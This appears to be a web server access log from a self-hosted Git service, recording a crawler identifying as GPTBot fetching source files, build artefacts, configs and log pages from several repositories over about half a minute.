"/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 10233] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:16:45:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 6268] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:16:45:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/PythonTest/main.py?display=source" [Client 74.7.227.38] [Length 19748] [Gzip 5.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/PythonTest/main.py" -[17/Feb/2026:16:45:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/PythonTest/main.py?display=source" [Client 74.7.227.38] [Length 19751] [Gzip 5.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/PythonTest/main.py" -[17/Feb/2026:16:45:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/About.tsx?display=rendered" [Client 74.7.227.38] [Length 10948] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/About.tsx" -[17/Feb/2026:16:45:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fbuild%2fgold_monitor_full%2fPYZ-00.pyz" [Client 74.7.227.38] [Length 23776] [Gzip 4.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/PYZ-00.pyz" -[17/Feb/2026:16:45:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fbuild%2fgold_monitor_full%2fPKG-00.toc" [Client 74.7.227.38] [Length 23922] [Gzip 4.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/PKG-00.toc" -[17/Feb/2026:16:45:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fbuild%2fgold_monitor_full%2fPYZ-00.toc" [Client 74.7.227.38] [Length 23917] [Gzip 4.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/PYZ-00.toc" -[17/Feb/2026:16:45:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fbuild%2fgold_monitor_full%2fEXE-00.toc" [Client 74.7.227.38] [Length 23939] [Gzip 4.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/EXE-00.toc" -[17/Feb/2026:16:45:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/localpycs/struct.pyc?display=rendered" [Client 74.7.227.38] [Length 10944] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/localpycs/struct.pyc" -[17/Feb/2026:16:45:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/localpycs/struct.pyc?display=rendered" [Client 74.7.227.38] [Length 10916] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/localpycs/struct.pyc" -[17/Feb/2026:16:45:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/localpycs/struct.pyc?display=rendered" [Client 74.7.227.38] [Length 10945] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/localpycs/struct.pyc" -[17/Feb/2026:16:45:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/localpycs/struct.pyc?display=rendered" [Client 74.7.227.38] [Length 10916] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/localpycs/struct.pyc" -[17/Feb/2026:16:45:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/localpycs/struct.pyc?display=rendered" [Client 74.7.227.38] [Length 10945] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/localpycs/struct.pyc" -[17/Feb/2026:16:45:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/localpycs/struct.pyc?display=rendered" [Client 74.7.227.38] [Length 10944] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/localpycs/struct.pyc" -[17/Feb/2026:16:45:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/localpycs/struct.pyc?display=rendered" [Client 74.7.227.38] [Length 10917] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/localpycs/struct.pyc" -[17/Feb/2026:16:45:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977?files=C%2b%2bProject" [Client 74.7.227.38] [Length 115883] [Gzip 13.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project" -[17/Feb/2026:16:45:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor?display=rendered" [Client 74.7.227.38] [Length 14498] [Gzip 4.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor" -[17/Feb/2026:16:45:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor?display=rendered" [Client 74.7.227.38] [Length 14522] [Gzip 4.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor" -[17/Feb/2026:16:45:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor?display=rendered" [Client 74.7.227.38] [Length 14519] [Gzip 4.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor" -[17/Feb/2026:16:45:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker?display=rendered" [Client 74.7.227.38] [Length 16495] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker" -[17/Feb/2026:16:45:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/.gitignore?display=rendered" [Client 74.7.227.38] [Length 10906] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/.gitignore" -[17/Feb/2026:16:45:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/vite.config.ts?display=rendered" [Client 74.7.227.38] [Length 10909] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/vite.config.ts" -[17/Feb/2026:16:45:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/vite.config.ts?display=source" [Client 74.7.227.38] [Length 11979] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/vite.config.ts" -[17/Feb/2026:16:45:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/vite.config.ts?display=source" [Client 74.7.227.38] [Length 12151] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/vite.config.ts" -[17/Feb/2026:16:45:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-2_access.log?display=rendered" [Client 74.7.227.38] [Length 10981] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-2_access.log" -[17/Feb/2026:16:45:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-1_access.log?display=rendered" [Client 74.7.227.38] [Length 10936] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-1_access.log" -[17/Feb/2026:16:45:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-1_access.log?display=source" [Client 74.7.227.38] [Length 20864] [Gzip 9.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-1_access.log" -[17/Feb/2026:16:45:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-3_access.log?display=rendered" [Client 74.7.227.38] [Length 10980] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-3_access.log" -[17/Feb/2026:16:45:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-3_access.log?display=source" [Client 74.7.227.38] [Length 42679] [Gzip 12.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-3_access.log" -[17/Feb/2026:16:45:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-2_error.log?display=rendered" [Client 74.7.227.38] [Length 10998] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-2_error.log" -[17/Feb/2026:16:45:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-2_access.log?display=source" [Client 74.7.227.38] [Length 25001] [Gzip 10.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-2_access.log" -[17/Feb/2026:16:45:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-4_error.log?display=rendered" [Client 74.7.227.38] [Length 10932] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-4_error.log" -[17/Feb/2026:16:45:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-1_error.log?display=rendered" [Client 74.7.227.38] [Length 10974] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-1_error.log" -[17/Feb/2026:16:45:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-3_error.log?display=rendered" [Client 74.7.227.38] [Length 10975] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-3_error.log" -[17/Feb/2026:16:45:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-4_access.log?display=rendered" [Client 74.7.227.38] [Length 10936] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-4_access.log" -[17/Feb/2026:16:46:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-4_access.log?display=source" [Client 74.7.227.38] [Length 123709] [Gzip 13.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-4_access.log" -[17/Feb/2026:16:46:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/npm/letsencrypt/renewal/npm-4.conf" [Client 74.7.227.38] [Length 9850] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/letsencrypt/renewal/npm-4.conf" -[17/Feb/2026:16:46:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/npm/letsencrypt/renewal/npm-2.conf" [Client 74.7.227.38] [Length 9846] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/letsencrypt/renewal/npm-2.conf" -[17/Feb/2026:16:46:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/npm/letsencrypt/renewal/npm-1.conf" [Client 74.7.227.38] [Length 11182] [Gzip 3.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/letsencrypt/renewal/npm-1.conf" -[17/Feb/2026:16:46:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/npm/letsencrypt/renewal/npm-6.conf" [Client 74.7.227.38] [Length 9849] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/letsencrypt/renewal/npm-6.conf" -[17/Feb/2026:16:46:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/npm/letsencrypt/renewal/npm-4.conf" [Client 74.7.227.38] [Length 11183] [Gzip 3.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/letsencrypt/renewal/npm-4.conf" -[17/Feb/2026:16:46:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/npm/letsencrypt/renewal/npm-7.conf" [Client 74.7.227.38] [Length 11133] [Gzip 3.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/letsencrypt/renewal/npm-7.conf" -[17/Feb/2026:16:46:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/npm/letsencrypt/renewal/npm-7.conf" [Client 74.7.227.38] [Length 9841] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/letsencrypt/renewal/npm-7.conf" -[17/Feb/2026:16:46:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/npm/letsencrypt/renewal/npm-2.conf" [Client 74.7.227.38] [Length 11178] [Gzip 3.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/letsencrypt/renewal/npm-2.conf" -[17/Feb/2026:16:46:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/npm/letsencrypt/renewal/npm-1.conf" [Client 74.7.227.38] [Length 9849] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/letsencrypt/renewal/npm-1.conf" -[17/Feb/2026:16:46:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/npm/letsencrypt/renewal/npm-6.conf" [Client 74.7.227.38] [Length 11182] [Gzip 3.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/letsencrypt/renewal/npm-6.conf" -[17/Feb/2026:16:46:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/controller-next-todo.md?display=rendered" [Client 74.7.227.38] [Length 11767] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/controller-next-todo.md" -[17/Feb/2026:16:46:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/controller-next-todo.md?display=rendered" [Client 74.7.227.38] [Length 11768] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/controller-next-todo.md" -[17/Feb/2026:16:46:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6?files=npm" [Client 74.7.227.38] [Length 64151] [Gzip 10.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm" -[17/Feb/2026:16:46:09 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/npm/letsencrypt/renewal/npm-1.conf" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/npm/letsencrypt/renewal/npm-1.conf" -[17/Feb/2026:16:46:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/npm/letsencrypt/renewal/npm-1.conf" -[17/Feb/2026:16:46:09 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/npm/letsencrypt/renewal/npm-1.conf" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 